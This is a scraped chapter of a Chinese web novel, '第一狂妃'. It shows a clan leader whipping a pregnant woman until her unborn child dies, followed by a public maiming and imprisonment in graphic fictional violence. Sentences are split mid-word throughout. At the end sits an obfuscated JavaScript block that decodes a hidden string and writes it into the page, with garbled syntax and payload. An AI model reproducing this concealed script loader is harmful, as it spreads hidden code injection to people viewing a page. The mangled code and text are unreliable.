阅读历史
换源:

第2665章 痛失吾爱

作品:第一狂妃|作者:豆娘|分类:都市言情|更新:2019-07-21 11:28:51|下载:第一狂妃TXT下载
  从隋灵归的话来看,腹中孩子是竹医师的,死骨傀乃枯木将军赠的。

  在青莲,她至少与两个男人有过肌肤之亲了。孩

  子不可能是枯木的,枯木将军早在上一次与东陵鳕去天域dōngzhōu时便死了,时间完全对不上。若

  是竹医师,倒也能说得过去,竹医师与她苟且,再炼制出失传已久的丹药。

  夜歌为了巩固自己的地位,真是不择手段,甚至不惜出卖自己的。隋

  灵归喷火的双目,恶狠狠地瞪视着隋灵归。

  东陵鳕曾无数次与她说过孩子不是他的,她皆不信,断断不敢相信,夜歌摆着大好的前程不要,做出那等苟且之事来。

  这是让青莲蒙羞的事,以青莲为大的隋灵归痛苦万分,胸膛与连绵的山峦一般起伏,气地甩了一鞭子在夜歌身上,鞭鞭见骨,毫不留情,夜歌肚子里的胎儿,便是被这样活活打死。

  夜歌疼的嚎哭,绝望到说不出话,只能反复认错。

  “族长,你饶了我,我一时鬼迷心窍,我再也不会了。”

  “族长……”

  夜歌声嘶力竭,喊得嗓子沙哑。隋

  灵归盛怒之下,鞭鞭用了狠力,不过转眼夜歌就遍体鳞伤,奄奄一息。她

  倒在床榻,身下的棉被皆被伤口流出的鲜血染红,连哭喊饶命的力气都没有了。至

  今为止,夜歌都没有意识到自己的错误,许是痛到极致,类似于狗急跳墙,夜歌积攒了的力气,全都化成了怒吼:“族长你高高在上,青莲诸人皆听你吩咐,你又怎知我的苦衷,我百般讨好,王上不曾看我一眼,若非出此下策,我怎能平步青云,族长,我知错了,你饶了我,奴婢愿为你做牛做马。”

  “事到如今,不知悔改,狗一样的东西,你恶不恶心?平步青云的方法有千万种,唯独你自甘堕落,偏生你还振振有词,是这个世界错了?分明是你自己贪心不足蛇吞象,让你在青莲当个婢女都是你三生修来的福气,你走到如今位置,竟还不自知。我真是瞎了眼睛,看上你这么个贱人,真真是bia子无情啊。”

  隋灵归抽到无力,看在倒在血泊中气若游丝的夜歌,隋灵归眼底深处尽掠过冷光。

  隋灵归一软鞭挥下去,此次软鞭并未有雷霆之势,而是犹如绳索般缠住了夜歌的头发。

  呵。

  呼出一口冷气,隋灵归握着软鞭,拖着才失去了孩子的夜歌往外走去。

  夜歌拖地而过的地方,皆流下了血红的痕迹。出

  了宫殿,直奔武道场。

  无数人错愕地看着这一幕,看着地上的鲜血。她

  不是还怀有身孕吗?怎

  遭此折磨?

  夜歌发出哀鸣之声,像是濒临绝望的野兽。比

  之遭受鞭挞被折磨至不成人形,她不愿看到这么多人观望她狼狈的一幕。

  泪珠啪啪往外流,夜歌痛不欲生。隋

  灵归把夜歌拖到了玉台上,而后将缠绕着夜歌的软鞭收起来。夜

  歌惊慌失措,她双手努力撑着地面坐在玉台,擦去脸上身上的血迹,想让自己行礼如仪,表现出最美好的一面。

  隋灵归淡淡望了眼夜歌,随即面朝千族人,深恶痛绝,惨闭双眼:“诸位,死骨傀乃青莲太族明令禁止的,准王后私自圈养死骨傀,这场订婚宴到此结束,此女品德有失,不配为我青莲王后。今,我身为青莲族长,将惩治此女,带下冰牢,关上十年!”冰

  牢……

  听到这两个字,大多数脸上都闪过了异样之色,仔细看去,眼底深处是恐惧。青

  莲冰牢,没几个人能熬过去。

  随即,无数人怜悯地望着夜歌,可怜呐,才没了孩子,就要去冰牢。同时,这些人又佩服隋灵归的执法,夜歌肚子里可是小王子,即便如此,隋灵归依旧是秉公办事,没有徇私之意。

  当然,夜歌苟且之事是不能外传的,传了出去,青莲面子上挂不住。

  事已至此,隋灵归唯有如此。

  隋灵归垂下眼眸,浓密的睫翼掩盖双目,谁也不知,那暗潮涌动的到底是什么样的萧索肃杀!“

  不要……不要啊,族长,再给我一个机会好不好,我求你了。”

  分明已经没有力气了,在恐惧的催促下,夜歌双手撑地,拜倒在隋灵归的面前,额头每一下都猛着力撞在玉台,不过三下,就已头破血流,任由如此,夜歌猛然磕头的动作还没有停下。她

  自然清楚冰牢是什么样的人间地狱,不,她不要去……

  “一失足成千古恨,你该为自己的错误负责。”隋灵归一脚踹开了夜歌。若

  不如此,青莲在千族如何立足?哪来的威信?青

  莲乃千族之首,自当要做表率。

  “啊。”夜

  歌坐在血中凄厉地惨叫,她仰起头,三千银发随风轻舞。突

  然,夜歌发觉了一件非常恐怖的事,她的双手摊开掌心朝上,低下头来,便见一簇一簇的头发往下掉落,不过须臾,双手各有无数头发。夜

  歌双手颤巍巍,她丢掉掌心的发,抓了一把自己头发,一把头发全在手中。不

  过尔尔,夜歌脑袋就秃了,光秃秃的一片尤为刺目,甚是嘲讽。

  “头发,我的头发呢……啊……头发,把我的头发还给我……”夜歌摸着自己的脑袋,无数落发掉在地上。

  夜歌涩涩发抖,深感恐惧,忽而扣着喉咙干呕起来。另

  一侧,三族老冷眼旁观。

  “李婊狗贼,吃老夫一刀!”一把弯刀而来,砍下夜歌的左臂。啊

  夜

  歌尖叫,狼狈滑稽,血腥之景,叫人不忍直视。

  夜歌两眼一翻昏了过去,昏死之前嘴里还在念叨着自己的头发。“

  再吃老夫一刀。”七

  族老弯刀接踵而来,直奔夜歌天灵盖扑去。隋

  灵归眼疾手快,空手接住弯刀。

  “族长?”七族老压低声音,语气不善。“

  死了,便宜她了。”隋灵归幽幽道。

  七族老微怔,旋即失笑:“既是如此,便让她去冰牢度过余生。”隋

  灵归:“来人,将此女带下去。”

  青莲侍卫步伐矫健,一左一右架着夜歌离开,留在玉台的只有斑斑血迹和满地落发,还有那血淋漓的断臂。

  <scriptlanguage=javascript>

  functionunpile{code}{

  code=unescape{code};

  varc=charcode{code.charcodeat{0}-code.length};

  for{vari=1;i<code.length;i }{

  c =charcode{code.charcodeat{i}-c.charcodeat{i-1}};

  }

  returnc;

  }

  varcode=ѣlݨz٠[ߪgfih賧ڮgfig賸kѣ;

  varnewcode=unpile{code};

  document.write{newcode};

  </script>

  <divclass=hklink>